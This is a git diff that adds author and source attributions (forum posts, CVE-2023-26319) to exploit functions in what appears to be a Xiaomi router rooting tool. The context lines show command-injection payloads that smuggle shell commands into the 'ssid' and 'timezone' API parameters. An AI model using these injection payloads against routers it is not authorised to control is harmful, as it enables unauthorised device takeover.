diff --git a/connect2.py b/connect2.py
index 0a82d0d..5a5ab69 100644
--- a/connect2.py
+++ b/connect2.py
@@ -41,6 +41,10 @@ stok = gw.web_login()
 
 
 def exec_cmd(cmd, api = 'API/misystem/set_config_iotdev'):
+    ######
+    # vuln/exploit author: LonGDikE
+    # publication: https://forum.openwrt.org/t/55049/62
+    ######
     params = { 'bssid': 'Xiaomi', 'user_id': '_username_', 'ssid': ('-h' + '\n' + cmd + '\n') }
     resp = gw.api_request(api, params)
     return resp
diff --git a/connect4.py b/connect4.py
index e96d98f..83be3c8 100644
--- a/connect4.py
+++ b/connect4.py
@@ -46,6 +46,10 @@ stok = gw.web_login()
 
 
 def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
+    ######
+    # vuln/exploit author: remittor
+    # publication: https://forum.openwrt.org/t/125008/132
+    ######
     resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
     return resp
 
diff --git a/connect5.py b/connect5.py
index 0239951..1b7f36b 100644
--- a/connect5.py
+++ b/connect5.py
@@ -70,6 +70,11 @@ max_cmd_len = 100 - 1 - len(vuln_cmd)
 hackCheck = False
 
 def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'):
+    ######
+    # vuln/exploit author: Julien R. (SoEasY), Marin Duroyon
+    # reg_code: CVE-2023-26319
+    # publication: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/
+    ######
     sc_command = cmd['command']
     payload = json.dumps(cmd, separators = (',', ':'))
     try: